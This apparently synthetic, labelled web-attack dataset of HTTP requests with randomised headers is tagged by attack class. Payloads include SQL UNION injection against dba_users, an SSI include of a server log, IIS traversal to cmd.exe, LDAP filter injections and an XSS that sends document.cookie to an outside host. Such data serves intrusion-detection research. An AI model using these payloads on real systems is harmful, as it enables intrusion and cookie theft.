Via: 6.5 252.88.22.86, 57y/6.6 149.222.165.7, 9.5 www.4ztet.jpg:9432
Transfer-Encoding: lrso; hnzirn=Erekhe
Upgrade: kmeyp7/6.4, oab/2.7, peZa/7.9, tihsau/8.6, rstvvt/0.5
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 775994
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41732
Start - Id: 41465
class: SqlInjection
POST /8A33hTaEAg8-r/6ewif0gumi6drot/bticaJgdai7/lZ1X/51X0.DVsjR/ejMIy/wCpmr/D0YXaW/p1.sPeBYNA/8eN/ayPVphG8M.cfm? HTTP/1.0
Content-Length: 247
Content-Language: raeel
Content-Encoding: compress
Content-Location: /7qdun/juog/indi8vlw/5slo/o0gLh.asp
Content-MD5: U2VyaXN4c25iYWVhc2VoVw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Sep 07 17:57:45 UTC
Last-Modified: Tue, 25 Oct 05 15:57:08 GMT
Host: www.eEneftEsjp.biz
Connection: huxEso
Accept: */*
Accept-Charset: iso-8859-3;q=0.4, x-mac-korean;q=0.2, x-mac-icelandic;q=0.0, iso-2022-jp
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: esyaocee='8'
Client-ip: 207.142.56.123
Cookie: hev=12282;Yh0bc=3;ct9=sr9u>;LsstoLZrtosbpdr=3;rm=9bainljietaldss;aqy=i zes?eacz egijr6p
Cookie2: $Version="83"
Date: Sat, 07 Jan 06 09:05:45 UTC
ETag: "sthKhUmpoIefQLam-l"
Expect: ttsRiz
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Fri, 25 Jan 08 07:47:21 UTC
If-Match: "YSzy.jGdKetGKoShB3"
If-None-Match: *
If-Range: Thu, 03 Jun 04 14:16:54 UTC
Max-Forwards: 17
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM bHd1aG10VHRzQWhwb3BhZW84b3RpYXNjY2tlbGFhQ21laXNhaTZ0ZQ==
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: http://www.tnhoIwI.org/bnnt/OvTM/onig/gYlt.wav
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/7.6 (X11; U; SunOS sun4u 6.8; bt-ee; rv:7.6.7) Gecko/47385692
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 054x8213
Via: FTP/9.0 157.134.148.92
Transfer-Encoding: gzip
Upgrade: EorNU/7.3, mot/1.8
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

eab=5727766&eeyhutunetnes=0023&0s4wtr6=8&znsgdof=tLgiewns&dropESdconnectR1WJ=e(8\ts&bBNStkdhA7Uexec=ee&obt&nlim=aaoed'/**/UNION/**/SELECT/**/tpn/**/FROM/**/dba_users/**/WHERE/**/aa2lb/**/like/**/'%25

End - Id: 41465
Start - Id: 39788
class: SSI
GET /pQlEQptyyK/9odts/0fewposlw/natrrse7uxve5rxn/peeceLf/i3htatb/.Cxvc8/L2s68qVU7.png?VlikeH9tER-TDW=74990&7yaiaeht=45&ghaYrn=%25iq10lEoliedtj&tezinhlys5=cRf4%404bvcG%40&KWlBXB3=%3C%21--+++%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&o7zaatm=mk5yV&7gsnH=Dlqt&flueettaohc=80477&rw1=28&heazeat8ghlC0ce=9&._nbetweenu=it%5Cr&oiiimDisncTaa=amensh&ouem=th+7e6&t6=w1enee HTTP/1.1
Host: www.rzbnyt.biz:63
Connection: keep-alive
Accept: image/gif;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: horA-6;q=0.0
Cache-Control: max-stale=925
Client-ip: 251.84.251.102
Cookie: me=hnhitaaaselect;heneiia7tatbial=ns@YYrNu;nr=4404926;xik=o2GvR0c3pPxH;sznrreiahho=0dlEr
Cookie2: $Version="9"
Date: Sun, 06 Feb 05 13:58:59 GMT
ETag: W/"Ne7FULYkvbu.-BWNg_8"
Expect: ailel=ewuid;sddttdad
From: otit3le@ijlhneot1o.com
If-Modified-Since: Thu, 11 Jan 07 12:25:57 CET
If-Unmodified-Since: Tue, 29 Jul 08 16:37:07 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: "T6LG3gbe8h9hzYuGw"
Max-Forwards: 15
MIME-Version: 0.5
Pragma: i=no
Proxy-Authorization: Digest username="usl1mwH3"
Authorization: NTLM b1JSc0VobndhOTllZW1JenR2a2xzZG5lb2RGNXBYN25xcGk4aHllNA==
Range: 538-81062,0-593619
Referer: /aroisrdh/ousiiM/idosNe/yiesmyC/TtlGoev.fgf
Trailer: Upgrade
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 9.1; nc-at; rv:5.2.6) Gecko/44519579
UA-CPU: Sparc
UA-Pixels: 181x202
Via: FTP/5.9 www.snhelRO2.css, 6.3 www.amdrli.shtml, HTTP/3.4 105.227.173.161
Transfer-Encoding: deflate
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39788
Start - Id: 44330
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.nn2aaldc.net:6806
Connection: keep-alive
Accept: image/jpeg, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: tbqi-eth;q=0.2, fser-Atg, hia-c;q=0.9, w-jabs4aag
Cache-Control: max-age=222
Client-ip: 70.255.193.81
Cookie: pexk=zO-HOG91k;fAEmf5olleo=pterftnf1IIwye;LVSfj70KRNZ=68530883;hIloaaggrunqm=1iWvsy;gmualoe5t=xmletei
Cookie2: $Version="92"
Date: Thu, 19 Feb 09 04:10:59 CET
ETag: "JwOlqko42x3NtlOT"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Fri, 28 May 04 09:10:38 GMT
If-Unmodified-Since: Fri, 11 Jan 08 24:08:50 UTC
If-Match: *
If-None-Match: *
If-Range: "KifzXthQy8DwbK-h6d"
Max-Forwards: 449
MIME-Version: 1.6
Pragma: htx5P='d'
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: http://uihrzd.st/uodp5d.sh
TE: deflate;q=0.5
Trailer: If-None-Match
User-Agent: 01hadseOh/5.8.0
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: ao4d8z/0.3 www.Fpodoa6.htm, 0.7 102.52.140.200, byeheb/8.3 39.125.50.193:9139
Transfer-Encoding: compress
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44330
Start - Id: 41838
class: SqlInjection
GET /Gxwp-AQrdTPs/ytoatos/y6hd/iEu-5Hcm5ImayMLY/31n6-C/nocoeO/ahrs6ysls7tmdwlnsS1v/hokyD.KD6fhoAfAM4j/acue80o/etc.vWQhtaccesCcQj0C/n8-uT-g__@8d1P4nH.exe?rta0r=S%7C&oLmrva1=e8s6hjeTmgiL&saeuboeznee5jt=tXwJA&nhaotaeqn=+p&iFdeweitev4ton=%27++++%29+++UN%2F**%2FION++ALL++++SEL%2F**%2FECT+%276bs%27%2C49771%2C520%2C%27n7ffroee%27%2C9+++FROM+tnResiu+++WHERE++++%28++++%27%27+%3D+++%27&snebibNCea=72009448&ojdiixtaheig5=kp6eterlxeey&rnlon2oha3=nNee HTTP/1.0
Host: 202.148.148.179
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity
Accept-Language: *
Cache-Control: tEir=e
Client-ip: 196.90.56.27
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="58"
Date: Tue, 13 Feb 07 19:21:39 CET
ETag: W/"sEO6-Hh4WcNew12P"
Expect: 3esf
From: wIdO@lerc.gov
If-Modified-Since: Mon, 21 Nov 05 20:42:14 CET
If-Unmodified-Since: Sun, 16 Mar 08 11:31:16 CET
If-Match: "wpeagd3IDuXBc1YC"
If-None-Match: "a9kd1k72KCg5uAD"
If-Range: "yPkp7d0f8_yExhrUxI"
Max-Forwards: 334
MIME-Version: 1.6
Pragma: pncdaVt='fbnaente'
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: Basic emg1YUlsOnNuOW90ZDh0
Range: -0842
Referer: http://pepsd.gov/Eceolaa/faifedoR/mepeot/miithdn.php4
TE: trailers
Trailer: Max-Forwards
User-Agent: etasrhnssef0tw
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: 2.7 www.n1sih.jpeg:44, 6.6 15.133.130.11
Transfer-Encoding: identity
Upgrade: 7r8/5.9, eevr/0.1, escfA/5.5, itqIta/3.3
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 80.139.161.110
X-Serial-Number: 431124702375
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41838
Start - Id: 38903
class: LdapInjection
GET /aoc6etM/wobhtsitNc/io9Q9EOO0/nQMYU2@tLp3u.Q0L7/iDzOFybOmwC/mkrrom8mssip2/eX0N9H/bXoj-hKK/htsetctf/dsvv3eaeutyE1h/gcE@hfZFNFaFmpq/shl1.js?copyM_o=oaehhtt0y&Ciesa=59888048&htEs1odtcLIue=ds%7Cl%5Bd%3E+&tew=fhomeejtu4e%2F9bN&ts=nr%29%28%7C++++%28matko%3D*%29&or4ubsrjc=4764&nVcatNH@=8ctdimg&1lhbu=cDwvQqk&httpLN0a-0RHDD=n%3C%405o%27 HTTP/1.0
Host: www.ezEHymc.gov:45515
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, deflate, gzip;q=0.4
Accept-Language: *
Cache-Control: max-stale
Cookie: mieesoscr=9;atst2ser3=029923596
Date: Mon, 28 Aug 06 13:03:15 GMT
ETag: W/"2GEamMx-ggUI9_T@t"
Expect: 100-continue
If-Modified-Since: Mon, 27 Feb 06 11:19:12 CET
If-Unmodified-Since: Wed, 03 Mar 04 18:11:01 GMT
If-Match: "aAl5EME3QyB0rxU@Vku6"
If-None-Match: *
If-Range: Fri, 17 Nov 06 15:17:21 UTC
Max-Forwards: 9407
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: 77rz aCeoso2=eaoz
Range: 82450-0782,-876
Referer: http://cT1ne.it/asre/oce9hnt/njom0e/i4ldte.bin
TE: trailers,gzip;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: nqV7S9oucH http://www.1udyp.ch
UA-OS: Win95
Via: 4.6 www.0ddt.htm
Transfer-Encoding: gzip
X-Serial-Number: 99898684535119255
----: -------------------

null

End - Id: 38903
Start - Id: 39103
class: LdapInjection
POST /argnodmEicseasIn/9le6JrsShssgheltesde/sjGjd-pV7LE.cgi? HTTP/1.1
Content-Length: 48
Content-Language: nmS3i3T,y6d
Content-Encoding: gzip
Content-Location: http://eneX.com/nar3b/oanhw/eoiyons/aAcrrf6b.css
Content-MD5: M2lzZGVpa2J0aG5jQUtsZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Feb 10 13:06:27 CET
Last-Modified: Fri, 17 Dec 04 05:59:46 UTC
Host: 189.140.135.223
Connection: close
Accept: audio/*, audio/*;q=0.7
Accept-Charset: x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 91.76.159.57
Cookie: aiNxieyd=430553778;otma6Ezeviaape=h~je$omawlo;DqYhbmoJZ.zn=8204mtrlarrs5nhira;2tsftWxner=dKORMUc;eqroomsts=ml1h)(  |(Soy=*)
Cookie2: $Version="7"
Date: Tue, 24 Jul 07 10:34:17 GMT
ETag: "8OMHnMv76oPhyYCp-"
Expect: 100-continue
From: rBgoust@L2mctl.uk
If-Modified-Since: Fri, 27 Jul 07 08:10:49 CET
If-Unmodified-Since: Tue, 05 Jul 05 17:11:48 CET
If-Match: "8B6az-i63xPdy2E"
If-None-Match: "HGdsQ5he27f2XKa"
If-Range: Mon, 06 Feb 06 19:12:11 UTC
Max-Forwards: 19
MIME-Version: 5.1
Pragma: Doenwim=eouedH
Proxy-Authorization: Digest nc=76862bbc
Authorization: NTLM bXRqYTE0YWt0dXJxcHhlaThhbnNjdGIwb3VodnpMNFRzaWI0cmR0cQ==
Range: 24-1,306163-10
Referer: http://www.u34esdy.be/ueeerd.gz
TE: deflate,trailers
Trailer: If-Match
User-Agent: dGqY87dcI http://www.adpa.st
UA-Color: color8
Via: HTTP/8.2 www.oqneh3ka.js:1, 4.6 www.dh4ahHo.shtml, 9.7 www.4tcznii.tiff
Transfer-Encoding: deflate
X-Forwarded-For: 253.112.146.139
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

st5dermn1Ids8R=56084451&esiban=5511379&dten=5707

End - Id: 39103
Start - Id: 39018
class: LdapInjection
PUT /uamDk.window.open-vprocessing-instructionSC9S.html? HTTP/1.0
Content-Length: 19
Content-Language: c,kene,estas41
Content-Encoding: identity
Content-Location: http://www.1cle9.be/dshn/lamgv/h3usA/dsl3/Rcri.conf
Content-MD5: dDFKcEVock5sdGFyYWVoaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 May 08 20:15:19 CET
Last-Modified: Sat, 10 Jan 04 10:41:06 GMT
Host: www.aa8easx.biz:506
Connection: gIbre
Accept: */*;q=0.6
Accept-Charset: koi8-r;q=0.0, iso-8859-3
Accept-Encoding: gzip, deflate;q=0.8, compress
Accept-Language: )(   |  (displayName=had*)  (name   =had*  )(   mail=had* )
Cache-Control: no-store
Client-ip: 117.11.72.58
Cookie: nshiodheee=Cviae cee qu[ro;mbeGu5tdar66=$K;r2x=]hi2;@8HnkeeE=7;sjftmowd1283tar=897838
Cookie2: $Version="997"
Date: Fri, 26 Aug 05 17:28:46 UTC
ETag: W/"lXyrX6B53KtLWw4i1K3"
Expect: Oupd=rydr
From: rtYnihG@mn4eem.gov
If-Modified-Since: Mon, 03 Jan 05 22:04:05 UTC
If-Unmodified-Since: Sun, 05 Aug 07 02:35:06 UTC
If-Match: "Zg44Z2A.QOrP0I8b"
If-None-Match: *
If-Range: *
Max-Forwards: 7091
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Basic bHNlcG06Z3Nob2V6bmM=
Authorization: NTLM U3RhY25uYXlvZWl0ZXJvZ3VlZXhlWGVwZWxzb2l3YjE=
Range: -085
Referer: http://www.lsNjqr.org/te2iwe/Tsmci/nlte.php
TE: chunked,chunked
Trailer: User-Agent
User-Agent: tiwoulire/1.6.7
UA-CPU: 68000
UA-Disp: 744,650,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 960x5747
Via: 7.2 104.77.245.30
Transfer-Encoding: identity
Upgrade: yuanig/5.9, tImh/5.1
Warning: 562 166.100.218.31 "elnelas" "Mon, 19 Dec 05 03:33:45 UTC"
X-Forwarded-For: 145.87.92.159
X-Serial-Number: 13381334
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

natThu4g=0515304187

End - Id: 39018
Start - Id: 47781
class: XSS
GET /rdeog1f/lwH/fnbehv/nBBkcA5AkSfGxJSufx79/hlwasc/nate/-MEXesock_streamc/l68OM/e06jq7mCp3sojoKs./lT5-OiS/80sbnilimaerlqu.cfm?C4Bm2LLxtermAJ=818&ean4n=180&td1lrilien1l=%3B1rV0anlf&-Yu34m=iitsjgeDAee8ahsprn&oldhHpLebqnui6r=65280&Z@SZ=%3Cimg+++src++++%3D+%22mocha%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.inet.com%2Fcgi-bin%2Fndlereilta.cgi%27%2Bdocument.cookie%29%3B%5D%22%3E&tie6dcw=r&G2nwrS5E7=5863&lDufTzntEo0no=436747638&oialcia6kDqrt=id%2Ftmptbetweene&q7nmmesfis1=8990&DKyUg=%25&6bnuolocph=i5toxsiTf HTTP/1.0
Host: 70.117.250.113
Connection: ahiNto
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: arszn-tseit, NEom-teE;q=0.5, csOe-5, sn-rby;q=0.4
Cache-Control: O=orsd
Client-ip: 188.81.73.66
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="49"
Date: Fri, 17 Aug 07 15:57:55 GMT
ETag: W/"llM-xJQU9H5XeIPnwx"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Sun, 11 Jan 04 10:47:39 UTC
If-Unmodified-Since: Thu, 03 Dec 09 20:04:53 GMT
If-Match: "RoRP6P46gnywWNY.S"
If-None-Match: *
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 25
MIME-Version: 7.4
Pragma: t7=x7
Proxy-Authorization: ynhmte fnet1=f4tno
Authorization: Digest nonce
Range: 2672-661117
Referer: http://www.ettuotN.gov/zcej8eao/beEnec/enr08Emo.shtml
TE: chunked;q=0.0,deflate;q=0.1,trailers
Trailer: Accept-Language
User-Agent: behqta
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: 2.2 241.126.131.208, 0.8 244.2.239.102:70
Transfer-Encoding: deflate
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 119 www.u4avcao.jpeg "eaDh3tssiseettoa2" "Mon, 21 Aug 06 21:05:07 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47781
Start - Id: 44514
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: www.Frstt.uk:875
Connection: close
Accept: image/*;q=0.5, image/*, audio/*;q=0.1
Accept-Charset: gb2312;q=0.3, big5;q=0.3, euc-cn;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: wlho-dnlel7;q=0.5, hhadeoit-tye2enna, hSeaysee-anSr, saEmi-jaertiod, nt-iFhinlna;q=0.1
Cache-Control: min-fresh=39545
Client-ip: 11.33.202.95
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="1"
Date: Thu, 03 Dec 09 21:09:18 UTC
ETag: W/"HcdXasxzouezv38hXg"
Expect: zfHsd=neeRao
From: aOaort0e@ftfehuiid.cz
If-Modified-Since: Fri, 26 Mar 10 09:09:18 GMT
If-Unmodified-Since: Fri, 06 Jun 08 09:44:51 CET
If-Match: "ygxw0oO2wAerM5Mu"
If-None-Match: "6mtLE695gjWc2wdkPTH5"
If-Range: *
Max-Forwards: 61
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 7-42
Referer: /totci1/eEeocna/9diic2/ineefctp/inbga.dll
TE: trailers
Trailer: Warning
User-Agent: 8.fo@bE http://www.rrKsni.it
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: HTTP/3.8 114.84.152.177, ceehse/5.9 www.oeikl.htm:6
Transfer-Encoding: compress
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44514
Start - Id: 37354
class: LdapInjection
GET /nnnyectEoet/ryim/kscer9CmbowrpL/sgElicteletEmf/vCZn2K/lrk8ragu/LqGrpWeoUKgq/tCE@13Qu.u3K.html?tlg=404957759&nDeehoklu9wp=n4k&ua1kG=mhEtferede%3Dyt-s-%5Cxterm&SonoLo6vUs=44&Mjj1vIU2=anfXehfa&faeerrEfeaEp=nsystemt&raethi=060&ldal=80573&au4lgt=icprBR.&9ocratss9b=1597372&Bdelete7NaQAAZ5.=1L4bC HTTP/1.1
Host: www.oue5.uk
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-2022-jp;q=0.7
Accept-Encoding: )(|    (el=mnir*)
Accept-Language: *;q=0.4
Cache-Control: cao=kn
Client-ip: 53.64.15.53
Cookie: dUkxincludeHE_C=627
Cookie2: $Version="077"
Date: Thu, 18 Jun 09 06:10:53 GMT
ETag: "Plajhq16bNWrBgRCob"
Expect: 100-continue
If-Modified-Since: Wed, 06 Oct 04 22:39:29 UTC
If-Unmodified-Since: Fri, 07 May 04 12:52:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 8.7
Pragma: b4bujjta='td2eoz'
Proxy-Authorization: Basic aThUVGhlOmRvb2ZnQQ==
Authorization: Basic cHBuZWRpZW86c2llbndz
Referer: http://nywf.ch/olftuioe/eputghan/tnz8b/axtc0se/otchfxe.sh
TE: trailers,trailers,gzip;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/4.7 (Machintosh; U; Mac OS X 7.0; ni-ug; rv:7.5.9) Gecko/76852377
UA-Disp: 794,0889,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5121x090
Via: FTP/4.5 www.Ssshnfd.shtml, FTP/7.4 199.115.120.100, 8.1 62.70.243.7
Transfer-Encoding: identity
Upgrade: Andfs/8.1, Ii2/4.5, hcHrn/0.5, hlardo/8.8, yqc/8.8
Warning: 959 www.0nrnnbes.css:737 "merriuI" 
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 854949447113384923
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37354
Start - Id: 42339
class: SqlInjection
GET /FH59qLv_h/hC5g6_/andvkt_NxmlX/6EkTUF5k8ouji3@1HN6/ntC10dU6I/ar/fj/wDAH1RSlPmf.png?td3wdmosaeu=%27+++OR++%27%27+%3D++%27&uRjXRoVc=56185334 HTTP/1.1
Host: www.afeEiqae.org
Connection: close
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: identity, deflate;q=0.4
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 70.112.181.255
Cookie: C.yFdivhZ=fjIA>eobject %rsdwf<Uldjw;oef=n0;aezgA5aWe=49Greplace
Cookie2: $Version="2"
Date: Wed, 04 Jun 08 20:53:50 CET
ETag: W/"W3Dl8Wik9y5E8q13ewRG"
Expect: 100-continue
From: taa7@n9I9.uk
If-Modified-Since: Thu, 05 Feb 04 05:29:01 GMT
If-Unmodified-Since: Wed, 24 Aug 05 07:26:40 CET
If-Match: *
If-None-Match: "kAFoLo6@VRtu3Cb"
If-Range: *
Max-Forwards: 168
MIME-Version: 5.2
Pragma: rrab=e0wtiae
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -183629,81875-7
Referer: /iw73.wav
TE: gzip;q=0.6
Trailer: Accept-Encoding
User-Agent: exMvKy8u http://www.iiFre.uk
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: HTTP/7.4 www.ungit.jpg, 4.7 www.nyodtl.jpg, 6.2 5.187.23.67
Transfer-Encoding: deflate
Upgrade: eEtha/8.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 51653386435804651
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42339
Start - Id: 38641
class: LdapInjection
GET /atFhFG5AL/dFxQ-wlmc9QkOg/WdtqFteeEi8/nntemuTiuose/nnymlT/eytnprxeou/Nmgv5DAWn/eatmel5kahiotrqetRbd/x-G.png?Lsfnt=aiV&iesdhbsInau=9808&neHowientyt=%29++++%28+%7C++%28displayName%3Dhad*%29+++%28name+++%3Dhad*+%29%28++mail%3Dhad*++++%29&egetr1nYvo=h&JXeZncIiframe2CCr=D+j&2idstm=iHqn&iamo=aijxaSssjieesn&etoksnt9cOfaa=io%3Dotzedloc HTTP/1.1
Host: www.ieLesnnfii.biz
Connection: close
Accept: */*
Accept-Charset: us-ascii;q=0.3, hz-gb-2312, windows-1250;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=7
Client-ip: 48.249.181.128
Cookie: e6p6=heltfpoeuxb4Todsf;5imantwop=746;qls=4038;neu2wrsnt2=oOVM;ntsyt9musm5sp=scriptetepcrI6te;jhotskOa=s04Us2HH
Cookie2: $Version="7"
Date: Sat, 17 Mar 07 12:16:33 CET
ETag: W/"3BSBwrGl0.hUle1"
Expect: sedr=mo9hfett
From: ntz5@eaoe2Pre.cz
If-Modified-Since: Sun, 26 Feb 06 07:44:40 CET
If-Unmodified-Since: Wed, 05 Jul 06 23:29:34 UTC
If-Match: "AT@w0T@9Z.U5KU3efzq"
If-None-Match: *
If-Range: "HRH-EFb1dIpQwfhfR"
Max-Forwards: 617
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXJBcHl0Y2RzZXVvdXBlWmRhbjd0cmp0dnRpNTFmTlJjcmV0aQ==
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: /eync/tD0roIa/auesn/andktaLn/PontrnW.mpg
TE: chunked;q=0.4,deflate;q=0.6
Trailer: Accept-Charset
User-Agent: emhjsUctnr/0.2.2
UA-CPU: 68000
UA-Disp: 397,637,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 601x4009
Via: 3.5 239.134.19.81, i2ye8/1.1 79.244.51.121, 3.4 www.amtoun.tiff
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38641
Start - Id: 37457
class: LdapInjection
GET /npxwj/ei/efP9663OfA_mpPkoJZg/ntleleudGyftgo/gt3etyveE4errb/D8jzq8tmpRxB@E/cC/ee9q/erkarttleafm7lc/rvsyuUYpOkhoLwc3.aspx?5fFpFSi=55LjU&Cusj9rwasI2tfah=s+&afk9n8bIh=384545019&Bnlt4cuipirqowe=o%7EenAhE%3Csl&wStoorv=tke6u9&lMceHtyaE=8013&Rtelnetservicesl93scriptLS=36809&tcNtggtea2UaaY=2123010&rnuiy=40669&eoi=35&im4i7etesle=2CDFD5DSh&r3olqor2hutn=utog&0ignq=564513 HTTP/1.0
Host: 235.102.49.247
Connection: keep-alive
Accept: video/*;q=0.9
Accept-Charset: euc-jp, iso-8859-4;q=0.7, x-mac-ce, x-mac-korean;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: lfi='ebsIay'
Client-ip: 64.57.122.77
Cookie: 6Tai5wwifueto=)  (  |    (9Bodt=en8l6*);LzzzeITnnYr=a@lO.J;mdhedrjtgo=7teng;Bm2tnYXTEc3W=aNsGu6u
Cookie2: $Version="894"
Date: Sun, 25 Jan 09 06:20:34 GMT
ETag: W/"ZszLNnwcsJ1baB-TTfMt"
Expect: jaAeden=mduf1nkE
From: cdnol@lztd.biz
If-Modified-Since: Thu, 17 May 07 13:15:26 UTC
If-Unmodified-Since: Thu, 18 May 06 07:57:22 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 23 Feb 05 16:22:31 CET
Max-Forwards: 0775
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic Z3lzZWVycDplMGVibjA=
Authorization: NTLM dGViZ2ZEbW9ibXNobklsY3JzcnlrbWVrb3JvdHV1c2E0
Range: -85,-288767
Referer: /hwei/bo2ne/risanhh/idne.htm
TE: trailers,gzip
Trailer: Proxy-Authorization
User-Agent: hoas/6.6.3.1.6
UA-CPU: MIPS
UA-Disp: 732,386,8
UA-OS: Windows 95
UA-Pixels: 161x1713
Via: 5.3 www.nl7rlho.htm, ABaoe9/3.3 55.149.28.157
Transfer-Encoding: epdh
